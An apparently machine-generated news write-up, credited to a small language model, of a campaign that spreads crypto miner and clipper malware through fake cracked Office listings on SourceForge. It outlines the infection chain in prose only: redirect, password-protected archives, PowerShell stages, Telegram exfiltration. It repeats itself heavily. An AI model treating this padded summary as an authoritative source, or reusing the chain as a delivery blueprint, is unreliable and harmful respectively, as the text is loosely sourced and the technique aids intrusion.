Ethical Hacking News
A growing concern for cybersecurity, this malicious campaign highlights the importance of vigilance in protecting users from falling prey to cryptocurrency miner and clipper malware. Learn more about how this threat is spreading through cracked software listings on SourceForge.
Cryptocurrency miner and clipper malware are spreading through cracked software listings on SourceForge, exposing millions to malicious attacks.Threat actors are distributing malicious payloads via SourceForge under the guise of cracked versions of legitimate applications like Microsoft Office.The majority of potential victims (90%) are Russian-speaking users, with most located within Russia.A malicious campaign was discovered on a project called officepackage, which contained links to download Microsoft Office applications in Russian and had a long list of Microsoft Office applications listed on its webpage.Clicking on the link redirected users to a different page hosted on "taplink[.]cc" that served a malicious payload via a 7 MB ZIP archive.The malware created several files, including an MSI installer, UnRAR.exe, and a Visual Basic script that ran a PowerShell interpreter.The malicious campaign highlights the creativity and cunning of threat actors in leveraging popular platforms like SourceForge to distribute malware.
THN Exclusive: Cryptocurrency Miner and Clipper Malware Spreads via Cracked Sourceforge Software Listings, Exposing Millions to Malicious Attacks
The cybersecurity landscape has recently been plagued by a new wave of malicious threats, as cryptocurrency miner and clipper malware have been discovered spreading through cracked software listings on the popular platform SourceForge. This development serves as a stark reminder of the ever-evolving nature of cyber threats and the importance of vigilance in protecting users from falling prey to these malicious attacks.
According to Kaspersky, a leading cybersecurity company, threat actors have been observed distributing malicious payloads such as cryptocurrency miner and clipper malware via SourceForge under the guise of cracked versions of legitimate applications like Microsoft Office. The malicious campaign appears to be targeting Russian-speaking users, with 90% of potential victims located within Russia.
One project, officepackage, on the main website sourceforge.net, was found to contain Microsoft Office add-ins copied from a legitimate GitHub project. However, upon closer inspection, it became apparent that the project contained links to download Microsoft Office applications in Russian and had a long list of Microsoft Office applications listed on its webpage. Furthermore, hovering over the download button revealed a seemingly legitimate URL in the browser status bar, further convincing users to click on the link.
However, clicking on the link redirected the user to a completely different page hosted on "taplink[.]cc" that prominently displayed another Download button. Upon opening the 7 MB ZIP archive ("vinstaller.zip"), which contained two password-protected archives and a text file with the password to open the file, users were served a malicious payload.
Present within the new ZIP file was an MSI installer responsible for creating several files, a console archive utility called "UnRAR.exe," a RAR archive, and a Visual Basic (VB) script. The VB script ran a PowerShell interpreter to download and execute a batch file named confvk from GitHub. This file contained the password for the RAR archive as well as unpacked malicious files and ran another-stage script.
The batch file was also designed to run two PowerShell scripts - one of which sent system metadata using the Telegram API, while the other downloaded an additional batch script that then acted on the contents of the RAR archive. Furthermore, the confvk batch file created a new file named "ErrorHandler.cmd" that contained a PowerShell script programmed to retrieve and execute a text string through the Telegram API.
This malicious campaign highlights the creativity and cunning of threat actors, who have found ways to leverage popular platforms like SourceForge to distribute malware. The fact that the website has a Russian interface suggests that the attackers are targeting Russian-speaking users, with 90% of potential victims located within Russia.
The spread of cryptocurrency miner and clipper malware via cracked software listings on SourceForge serves as a stark reminder of the importance of vigilance in protecting users from falling prey to these malicious attacks. It is essential for individuals and organizations to exercise extreme caution when downloading software from untrusted sources and to keep their operating systems and applications up-to-date with the latest security patches.
In addition, this malicious campaign has also shed light on the growing threat of malvertising, as malicious ads have been discovered to deliver tampered versions of popular VMware utility RVTools. This development underscores how malvertising remains a persistent and evolving threat, capable of being used as a vector for delivering malicious payloads to unsuspecting users.
In conclusion, the spread of cryptocurrency miner and clipper malware via cracked software listings on SourceForge serves as a stark reminder of the ever-evolving nature of cyber threats. It is essential for individuals and organizations to exercise extreme caution when downloading software from untrusted sources and to keep their operating systems and applications up-to-date with the latest security patches.
A growing concern for cybersecurity, this malicious campaign highlights the importance of vigilance in protecting users from falling prey to cryptocurrency miner and clipper malware. Learn more about how this threat is spreading through cracked software listings on SourceForge.
Related Information:
https://www.ethicalhackingnews.com/articles/Cryptocurrency-Miner-and-Clipper-Malware-Spread-via-SourceForge-Cracked-Software-Listings-A-Growing-Concern-for-Cybersecurity-ehn.shtml
https://thehackernews.com/2025/04/cryptocurrency-miner-and-clipper.html
Published: Tue Apr 8 13:34:59 2025 by llama3.2 3B Q4_K_M